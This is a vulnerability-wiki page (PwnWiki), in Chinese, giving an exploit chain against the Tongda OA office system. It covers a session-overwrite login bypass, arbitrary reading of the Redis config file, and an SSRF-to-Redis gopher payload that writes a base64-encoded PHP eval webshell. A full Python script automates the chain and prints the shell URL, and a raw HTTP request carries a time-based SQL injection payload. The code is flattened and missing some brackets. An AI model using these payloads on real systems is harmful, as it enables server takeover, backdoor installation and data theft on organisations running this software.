pwnwiki.com
,
漏洞利用
通达OA 任意用户登陆条件需要管理员在线。
http://192.168.1.22/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0
访问路径,覆盖了session直接用cookie登陆,访问目录/general/进入后台。
如果什么都没有返回,那么就利用当前的phpsessid进行访问。
获取安装目录读取redis 配置文件:
/general/approve_center/archive/getTableStruc.php
任意文件读取:
/ispirit/im/photo.php?AVATAR_FILE=D:/MYOA/bin/redis.windows.conf&UID=2
读取到redis 密码。然后通过ssrf:
/pda/workflow/img_download.php?PLATFORM=dd&ATTACHMENTS=gopher://127.0.0.1:6399/
EXP
# -*- coding:utf-8 -*- import os import requests import re # author :print("") import urllib class GenerateUrl: def __init__(self, password, webroot, filename): self.password = password self.webroot = webroot self.filename = filename self.webshell = ''' <?php file_put_contents('11.php',base64_decode('PD9waHAgQGV2YWwoJF9HRVRbMV0pPz4='))?> ''' self.template = '''_*2 $4 AUTH ${password_len} {password} *1 $8 flushall *4 $6 CONFIG $3 SET $10 dbfilename ${filename_len} {filename} *4 $6 CONFIG $3 SET $3 dir ${webroot_len} {webroot} *3 $3 SET $1 1 ${content_len} {content} *1 $4 save *1 $4 quit ''' def __str__(self): webshell = self.webshell webshell = webshell.replace('"', '%22').replace("'", '%27').replace(",", "%2c") webshell = webshell.replace(' ', '%20').replace('\n', '%0D%0A').replace('<', '%3c').replace('?', '%3f').replace( '>', '%3e') self.template = self.template.replace("{password_len}", str(len(self.password))) self.template = self.template.replace("{password}", self.password) self.template = self.template.replace("{filename_len}", str(len(self.filename))) self.template = self.template.replace("{filename}", self.filename) self.template = self.template.replace("{webroot_len}", str(len(self.webroot))) self.template = self.template.replace("{webroot}", self.webroot) self.template = self.template.replace("{content_len}", str(len(self.webshell))) self.template = self.template.replace("{content}", webshell) self.template = self.template.replace('\n', '%0D%0A') return urllib.quote_plus(self.template) proxies = { "http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080", } def headers(phpsesion): return {"User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1.6) ", "Cookie": phpsesion } # 获取绝对目录 def get_path(url, headers): urlc = url url = (url + '/general/approve_center/archive/getTableStruc.php') try: data = requests.get(url=url, headers=headers, proxies=proxies).json() path = data'logPath'.split('\\')0 url2 = urlc + '/ispirit/im/photo.php?AVATAR_FILE=%s/bin/redis.windows.conf&UID=2' % path data2 = requests.get(url=url2, headers=headers, proxies=proxies) ress = re.search('requirepass .+', data2.text).group() return {"path": path, "redis_pass": ress.replace('requirepass ', '').strip()} except: exit('ERROR Cookie PHPSESSID expired') # ssrf写入文件 def ssrf_webshell(url, path, password): urlc = url path = path password = password a = GenerateUrl(password, path + "/webroot/", "666.php") url = url + '/pda/workflow/img_download.php?PLATFORM=dd&ATTACHMENTS=%s' % ('gopher://127.0.0.1:6399/' + str(a)) data = requests.get(url=url, headers=headers, proxies=proxies) ddd = requests.get(url=urlc + '/666.php') if ddd.status_code == 200: print('shell url:%s' % urlc + '/666.php') else: print('send shell ERROR') return True def get_cookie(url): url = url+ "/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0" headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", } try: response = requests.get(url=url, headers=headers) if "RELOGIN" in response.text and response.status_code == 200: exit("目标用户为离线状态") elif response.status_code == 200 and response.text == "": print("好了马上就能getshell了") cookies = response.cookies cookie = requests.utils.dict_from_cookiejar(cookies) if cookie'SESSIONID': return cookie'SESSIONID' else: exit('实在抱歉,getshell不了') else: print("未知错误,目标可能不存在或不存在该漏洞") except Exception as e: exit('实在抱歉,getshell不了') if __name__ == '__main__': import sys try: url = sys.argv1 cookie =get_cookie(url) headers = headers(cookie) root_path = get_path(url, headers) ssrf_webshell(url, root_path'path', root_path'redis_pass') except: print('python tongda.py http://127.0.0.1')
SQL
POST /general/appbuilder/web/officeproduct/productapply/applyprobygroup HTTP/1.1 Host: 10.211.55.5 Content-Length: 39 Accept: */* DNT: 1 X-Requested-With: XMLHttpRequest UserAgent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.103 Safar i/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://10.211.55.5 Referer: http://10.211.55.5/general/officeProduct/product_apply/index.php Accept-Language: en,zh-CN;q=0.9,zh;q=0.8 Cookie: SID_12=530bf0a5; SID_27=7202df24; USER_NAME_COOKIE=admin; OA_USER_ID=admin; PHPSESSID=1plu8qbupnesf40l9d02fdlvm5 ; SID_1=24205621 Connection: close arr5pro_id=151';select sleep(3) %23
免费、自由、人人可编辑的漏洞库--PwnWiki.com